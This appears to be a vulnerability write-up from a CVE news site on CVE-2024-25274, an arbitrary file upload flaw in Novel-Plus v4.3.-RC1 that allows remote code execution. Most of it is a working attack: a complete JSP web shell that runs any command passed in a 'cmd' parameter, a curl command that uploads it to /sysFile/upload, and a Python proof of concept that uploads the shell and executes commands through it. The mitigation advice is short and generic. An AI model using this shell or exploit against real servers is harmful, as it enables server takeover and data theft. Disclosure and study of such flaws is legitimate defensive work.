CVE CyberSecurity Database News

CVE-2024-25274 - Exploiting Arbitrary File Upload in Novel-Plus v4.3.-RC1 for Remote Code Execution

Poster -

In early 2024, a serious security flaw was discovered in the popular open-source platform Novel-Plus version v4.3.-RC1. This vulnerability, assigned CVE-2024-25274, allows an attacker to upload arbitrary files through the application's /sysFile/upload endpoint. If exploited, an attacker can achieve remote code execution on the server, putting sensitive data and server integrity at risk. In this article, we’ll break down what the vulnerability is, how it can be exploited, and what you can do to stay safe.

What Is Novel-Plus?

Novel-Plus is a modern, open-source online novel platform written in Java. It's widely used for managing private libraries of web novels, supporting authors and readers alike.

Vulnerability ID: CVE-2024-25274

- Component Affected: /sysFile/upload

How Does the Vulnerability Work?

The /sysFile/upload endpoint in Novel-Plus is designed to let users, admins, or other processes upload files (such as images or documents). However, in v4.3.-RC1, there is missing or improper validation on the type and content of uploaded files. As a result, attackers can upload files with dangerous code inside – like a web shell or a malicious script.

Once the file is uploaded, if it is placed in a web-accessible location and executed by the server, the attacker can run any commands on the server, effectively taking over the system.

1. Uploading a Malicious File

Suppose an attacker wants to gain command-line access to the server. They craft a simple web shell (for example, a .jsp file):

webshell.jsp

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    int a = -1;
    while((a=in.read())!=-1)
        out.print((char)a);
}
%>

This web shell lets an attacker run system commands by accessing:
http://<target-site>/<upload-path>/webshell.jsp?cmd=whoami

### 2. Uploading via /sysFile/upload

Using a tool like curl or Burp Suite, the attacker sends a POST request

curl -F "file=@webshell.jsp" http://target-site/sysFile/upload

If successful, the server returns a URL to the uploaded file, for example:
http://target-site/upload/2024/06/18/webshell.jsp

3. Gaining Remote Code Execution

Now, the attacker navigates to:
http://target-site/upload/2024/06/18/webshell.jsp?cmd=whoami

This triggers the server to execute the command whoami, returning the current user. The attacker can run any shell command this way, giving them full control over the server.

Python PoC for CVE-2024-25274

import requests

url = "http://target-site/sysFile/upload"
files = {'file': ('webshell.jsp', open('webshell.jsp', 'rb'), 'application/octet-stream')}
response = requests.post(url, files=files)

# Extract uploaded file path from response (may need adjustment)
uploaded_path = response.json().get('url')
print(f"Shell uploaded to: {uploaded_path}")

# Execute command through web shell
cmd_url = f"{uploaded_path}?cmd=whoami"
r = requests.get(cmd_url)
print("Command output:", r.text)

References

- GitHub Issue: RCE in upload endpoint
- CVE Details Page (when available)
- Original Chinese Disclosure

How to Protect Your Server

1. Patch as soon as possible:
Check the official Novel-Plus repository for updates or patches. Upgrade to a non-vulnerable version as soon as it becomes available.

2. Harden file upload:

Apply principle of least privilege to the upload controller.

3. Monitor logs:
Watch your server logs for suspicious uploads or access to uploaded files.

Conclusion

CVE-2024-25274 is a dangerous zero-day vulnerability in Novel-Plus v4.3.-RC1 that allows attackers to upload and execute arbitrary code on servers. This simple exploit can lead to a complete server takeover if not mitigated. If you run Novel-Plus, update immediately, review your file upload security, and monitor your logs!

If you found this post helpful, consider sharing it with your team or security community. Stay safe!

*Disclaimer: This post is for educational and defensive security purposes only. Unauthorized exploitation is illegal.*

Timeline

Published on: 02/20/2024 16:15:10 UTC
Last modified on: 08/29/2024 20:36:19 UTC